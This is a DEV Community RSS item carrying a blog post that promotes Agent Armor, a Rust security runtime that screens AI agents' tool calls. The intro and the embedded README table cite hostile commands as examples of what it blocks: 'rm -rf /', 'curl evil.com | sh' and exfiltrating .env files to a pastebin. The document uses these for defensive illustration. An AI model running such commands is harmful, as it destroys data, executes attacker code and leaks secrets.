<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Edoardo Bambini</title>
    <description>The latest articles on DEV Community by Edoardo Bambini (@edoardo_bambini_5badce6ff).</description>
    <link>https://dev.to/edoardo_bambini_5badce6ff</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3867069%2Fc8fafa16-813e-4f91-b6bc-b7f8d3264795.jpg</url>
      <title>DEV Community: Edoardo Bambini</title>
      <link>https://dev.to/edoardo_bambini_5badce6ff</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/edoardo_bambini_5badce6ff"/>
    <language>en</language>
    <item>
      <title>I built an open-source zero-trust security runtime for AI agents. Here’s what I learned.</title>
      <dc:creator>Edoardo Bambini</dc:creator>
      <pubDate>Wed, 08 Apr 2026 06:32:40 +0000</pubDate>
      <link>https://dev.to/edoardo_bambini_5badce6ff/i-built-an-open-source-zero-trust-security-runtime-for-ai-agents-heres-what-i-learned-538e</link>
      <guid>https://dev.to/edoardo_bambini_5badce6ff/i-built-an-open-source-zero-trust-security-runtime-for-ai-agents-heres-what-i-learned-538e</guid>
      <description>&lt;p&gt;The problem nobody is talking about&lt;br&gt;
You give an AI agent access to your terminal. It can run shell commands, read your filesystem, query your database, call external APIs.&lt;br&gt;
Now ask yourself: what’s stopping it from running rm -rf /? Or curl evil.com | sh? Or exfiltrating your .env to a pastebin?&lt;br&gt;
The answer, for most teams right now, is nothing.&lt;br&gt;
Frameworks like LangChain, CrewAI, AutoGen, and Claude Code give agents the power to execute. But none of them govern what agents actually do with that power.&lt;br&gt;
I kept running into this gap while building IAGA, an LLM governance platform. So I built Agent Armor to fix it.&lt;br&gt;
What Agent Armor does&lt;br&gt;
Agent Armor is a zero-trust security runtime. Every single action an agent tries to perform passes through a deterministic 8-layer pipeline before anything touches your infrastructure. The verdict is always one of three: allow, review, or block.&lt;br&gt;
No LLM in the loop for decisions. No probabilistic guessing. Pure deterministic evaluation.&lt;br&gt;
Here’s what the 8 layers look like:&lt;br&gt;
    1.  Protocol DPI — Deep packet inspection for MCP, ACP, and HTTP function calls. Schema validation against registered tool definitions.&lt;br&gt;
    2.  Taint Tracking — Tracks data provenance through agent execution. Catches credential leaks and exfiltration attempts.&lt;br&gt;
    3.  NHI Registry — Non-human identity management with HMAC-SHA256 attestation. Every agent becomes a first-class identity.&lt;br&gt;
    4.  Risk Scoring — Adaptive 5-weight composite model: statistical, contextual, behavioral, temporal, reputation.&lt;br&gt;
    5.  Impact Analysis — Pre-execution risk assessment with command analysis and impact prediction.&lt;br&gt;
    6.  Policy Engine — Workspace-level rules: tool permissions, protocol restrictions, domain allowlists.&lt;br&gt;
    7.  Injection Firewall — 3-stage prompt injection defense: pattern matching, entropy analysis, structural validation.&lt;br&gt;
    8.  Observability — OpenTelemetry-compatible spans, real-time SSE stream, webhook integrations.&lt;br&gt;
On top of that, there’s response scanning for PII and secrets, per-agent rate limiting, behavioral fingerprinting, and a threat intelligence feed.&lt;br&gt;
The benchmark&lt;br&gt;
I didn’t want to ship this without hard numbers. We tested Agent Armor against 16 real-world scenarios (both attack and benign), 50 repetitions each, 800 total requests.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Decision accuracy&lt;/td&gt;
&lt;td&gt;99.8%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;False positives&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pipeline latency&lt;/td&gt;
&lt;td&gt;~2.4ms across all 8 layers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Risk score range&lt;/td&gt;
&lt;td&gt;1 to 88 (continuous, not binary)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Attack categories tested&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
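To make the continuous risk-score range above concrete, here is a minimal sketch of what a 5-weight composite model feeding an allow/review/block decision could look like. Everything here, the weights, the component values, and the threshold cutoffs, is invented for illustration; the post does not document Agent Armor's actual model.

```rust
// Hypothetical sketch, not Agent Armor's real implementation.
#[derive(Debug, PartialEq)]
enum Verdict {
    Allow,
    Review,
    Block,
}

// components: statistical, contextual, behavioral, temporal, reputation,
// each normalized to the range 0.0..=1.0.
fn composite_risk(components: [f64; 5], weights: [f64; 5]) -> f64 {
    let total: f64 = weights.iter().sum();
    let weighted: f64 = components
        .iter()
        .zip(weights.iter())
        .map(|(c, w)| c * w)
        .sum();
    // Scale the weighted average to a continuous 0..100 score.
    (weighted / total * 100.0).round()
}

fn verdict(score: f64) -> Verdict {
    // Made-up cutoffs: high scores block outright, mid scores go to review.
    if score >= 80.0 {
        Verdict::Block
    } else if score >= 40.0 {
        Verdict::Review
    } else {
        Verdict::Allow
    }
}
```

With all five components near their maximum, a model shaped like this lands in the high 80s, the same neighborhood as the scores discussed below.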

&lt;p&gt;A &lt;code&gt;curl | sh&lt;/code&gt; scores 88. A &lt;code&gt;chmod 777&lt;/code&gt; scores 82. A prompt injection attempt scores 76. Every action gets a quantified risk score, not just a pass/fail.&lt;/p&gt;

&lt;h2&gt;Why Rust&lt;/h2&gt;

&lt;p&gt;I wanted governance decisions to be fast enough that agents don’t even notice the overhead. 2.4ms for 8 full security layers was only possible because the entire pipeline runs in Rust on Tokio, with no garbage-collection pauses and no cold starts.&lt;/p&gt;

&lt;p&gt;The dashboard is embedded directly in the binary via &lt;code&gt;include_str!()&lt;/code&gt;. No React, no webpack, no separate frontend build: one binary, zero frontend dependencies.&lt;/p&gt;

&lt;p&gt;Tech stack: Rust + Tokio, Axum 0.8, SQLite via sqlx, Argon2 auth, HMAC-SHA256 crypto, OpenTelemetry, SSE for real-time events.&lt;/p&gt;

&lt;h2&gt;Getting started&lt;/h2&gt;

&lt;p&gt;One command:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;docker compose up -d&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Or from source:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;git clone https://github.com/EdoardoBambini/Agent-Armor-Iaga.git
cd Agent-Armor-Iaga/community
cargo build --release
./target/release/agent-armor serve&lt;/code&gt;&lt;/pre&gt;
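To give a flavor of what one of those layers does internally, here is a toy version of the entropy-analysis stage of the injection firewall (layer 7): unusually high Shannon entropy in a tool argument can flag encoded or obfuscated payloads. The function names and the 4.5-bit threshold are mine, not Agent Armor's.

```rust
// Toy sketch of entropy-based payload screening; threshold is arbitrary.
fn shannon_entropy(s: &str) -> f64 {
    let bytes = s.as_bytes();
    if bytes.is_empty() {
        return 0.0;
    }
    // Count byte frequencies.
    let mut counts = [0usize; 256];
    for &b in bytes {
        counts[b as usize] += 1;
    }
    let len = bytes.len() as f64;
    // Shannon entropy in bits per byte: -sum(p * log2(p)).
    counts
        .iter()
        .filter(|&&c| c > 0)
        .map(|&c| {
            let p = c as f64 / len;
            -p * p.log2()
        })
        .sum()
}

fn looks_obfuscated(arg: &str) -> bool {
    // Random or base64-like blobs tend toward high entropy;
    // ordinary shell commands stay well below this cutoff.
    shannon_entropy(arg) > 4.5
}
```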

&lt;p&gt;Agent Armor also works as an MCP proxy for Claude Desktop: add it to your &lt;code&gt;claude_desktop_config.json&lt;/code&gt; and every tool call passes through the pipeline before reaching your MCP server.&lt;/p&gt;

&lt;h2&gt;Open-core model&lt;/h2&gt;

&lt;p&gt;The full 8-layer pipeline, response scanning, rate limiting, fingerprinting, and threat intelligence are all open source under BUSL-1.1 (which converts to Apache 2.0 after 4 years). Enterprise adds multi-tenancy, SSO/SAML, SIEM integration, and advanced ML-powered injection detection.&lt;/p&gt;

&lt;h2&gt;What I learned building this&lt;/h2&gt;

&lt;p&gt;The biggest lesson: security for AI agents can’t work the same way traditional application security does. Agents are non-deterministic by nature; they take different paths every time and combine tools in ways you can’t predict upfront. That’s exactly why the governance layer needs to be deterministic. You need a system that evaluates every action on its own merits, in real time, regardless of what the agent “intended” to do.&lt;/p&gt;

&lt;p&gt;The second lesson: latency matters more than features. If your governance layer adds 500ms to every tool call, teams will disable it. At 2.4ms, it’s invisible.&lt;/p&gt;

&lt;h2&gt;Try it, break it, tell me what’s wrong&lt;/h2&gt;

&lt;p&gt;I’m actively developing this and would genuinely love feedback from this community. If you find a scenario Agent Armor handles badly, open an issue. If you think a layer is missing, tell me. And if you find it useful, a star on the repo helps more than you’d think for an early-stage open-source project.&lt;/p&gt;
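For reference, the Claude Desktop wiring mentioned above might look roughly like this. The &lt;code&gt;mcpServers&lt;/code&gt; shape is Claude Desktop's standard config format, but the server name, binary path, subcommand, and &lt;code&gt;--upstream&lt;/code&gt; flag are placeholders I made up; check the Agent Armor README for the real invocation.

```json
{
  "mcpServers": {
    "my-tools-via-armor": {
      "command": "/path/to/agent-armor",
      "args": ["mcp-proxy", "--upstream", "/path/to/your-mcp-server"]
    }
  }
}
```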


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/EdoardoBambini" rel="noopener noreferrer"&gt;
        EdoardoBambini
      &lt;/a&gt; / &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga" rel="noopener noreferrer"&gt;
        Agent-Armor-Iaga
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      AI agents are getting tool access — shell, file system, databases, APIs, secrets. But &lt;strong&gt;nobody is governing what they actually do with it&lt;/strong&gt;. Frameworks like LangChain, CrewAI, AutoGen, and Claude Code give agents the power to execute. Agent Armor gives you the power to control, audit, and approve every single action before it happens.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;Agent Armor&lt;/h1&gt;
&lt;/div&gt;
&lt;p&gt;
  &lt;strong&gt;Zero-Trust Security Runtime for Autonomous AI Agents&lt;/strong&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#quick-start" rel="noopener noreferrer"&gt;Quick Start&lt;/a&gt; •
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#8-layer-security-stack" rel="noopener noreferrer"&gt;8 Layers&lt;/a&gt; •
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#api-reference" rel="noopener noreferrer"&gt;API&lt;/a&gt; •
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#dashboard" rel="noopener noreferrer"&gt;Dashboard&lt;/a&gt; •
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#configuration" rel="noopener noreferrer"&gt;Config&lt;/a&gt; •
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga#architecture" rel="noopener noreferrer"&gt;Architecture&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga/actions" rel="noopener noreferrer"&gt;&lt;img src="https://github.com/EdoardoBambini/Agent-Armor-Iaga/actions/workflows/ci.yml/badge.svg" alt="CI"&gt;&lt;/a&gt;
  &lt;a href="https://github.com/EdoardoBambini/Agent-Armor-Iaga/LICENSE" rel="noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/82325d2338691fb872cdd71763f351b57c89b746aeafbf818427bd374f989a47/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f6c6963656e73652d4255534c2d2d312e312d626c7565" alt="License"&gt;&lt;/a&gt;
  &lt;a rel="noopener noreferrer nofollow" href="https://camo.githubusercontent.com/112044537cde2a67424211ee0e2bf748dd1ce7a979963ef5f95bdf02a73246df/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f727573742d312e37352532422d6f72616e6765"&gt;&lt;img src="https://camo.githubusercontent.com/112044537cde2a67424211ee0e2bf748dd1ce7a979963ef5f95bdf02a73246df/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f727573742d312e37352532422d6f72616e6765" alt="Rust"&gt;&lt;/a&gt;
  &lt;a href="https://www.iaga.tech" rel="nofollow noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/17ce76b906658fb89f6e9bd30b95cb6968c82ad481cf263b8c3558f30ac6222b/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f736974652d696167612e746563682d707572706c65" alt="IAGA"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a rel="noopener noreferrer" href="https://github.com/EdoardoBambini/Agent-Armor-Iaga/assets/brain.gif"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fraw.githubusercontent.com%2FEdoardoBambini%2FAgent-Armor-Iaga%2FHEAD%2Fassets%2Fbrain.gif" alt="Agent Armor — Zero-Trust AI Agent Governance" width="600"&gt;&lt;/a&gt;
&lt;/p&gt;




&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;The Problem&lt;/h2&gt;
&lt;/div&gt;

&lt;p&gt;AI agents are getting tool access — shell, file system, databases, APIs, secrets. But &lt;strong&gt;nobody is governing what they actually do with it&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Frameworks like LangChain, CrewAI, AutoGen, and Claude Code give agents the power to execute. Agent Armor gives you the power to &lt;strong&gt;control, audit, and approve&lt;/strong&gt; every single action before it happens.&lt;/p&gt;

&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Why Agent Armor&lt;/h2&gt;
&lt;/div&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Without Agent Armor&lt;/th&gt;
&lt;th&gt;With Agent Armor&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Agent runs &lt;code&gt;rm -rf /&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Agent tries &lt;code&gt;rm -rf /&lt;/code&gt; → &lt;strong&gt;BLOCKED&lt;/strong&gt; at risk score 82&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent runs &lt;code&gt;curl evil.com | sh&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;8-layer composite scores it &lt;strong&gt;88/100&lt;/strong&gt; → highest threat tier&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent exfiltrates secrets to Pastebin&lt;/td&gt;
&lt;td&gt;Injection firewall catches prompt attack → &lt;strong&gt;SAFE&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"How dangerous was that action?" → no answer&lt;/td&gt;
&lt;td&gt;Continuous risk scores 1-88 with per-layer breakdown → &lt;strong&gt;QUANTIFIED&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;p&gt;…&lt;/p&gt;
&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/EdoardoBambini/Agent-Armor-Iaga" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;


&lt;p&gt;&lt;a href="http://www.iaga.tech" rel="noopener noreferrer"&gt;www.iaga.tech&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>rust</category>
      <category>security</category>
      <category>opensource</category>
    </item>
  </channel>
</rss>
